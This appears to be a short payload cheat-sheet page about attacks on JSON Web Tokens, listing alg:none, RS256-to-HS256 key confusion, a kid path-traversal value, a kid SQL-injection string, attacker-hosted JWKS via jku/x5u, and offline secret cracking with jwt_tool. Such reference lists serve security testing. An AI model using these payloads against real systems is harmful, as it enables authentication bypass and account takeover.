vulns.co
/
GKData.io MCP

Back to Payloads

JWT Attacks

Probe weak verification. Confirm with jwt_tool. Try alg:none, RS256→HS256 key confusion, and kid path/SQL injection; crack HS256 secrets offline.

Tags: jwt, auth, crypto

Controlled probes

  • alg: "none"  (strip signature, keep the trailing dot)
  • alg: "HS256" signed with the server's RS256 public key (key confusion)
  • kid: "../../../../dev/null"
  • kid: "key' UNION SELECT 'secret'-- -"
  • jku / x5u pointing at an attacker-hosted JWKS

Source: https://github.com/ticarpi/jwt_tool/wiki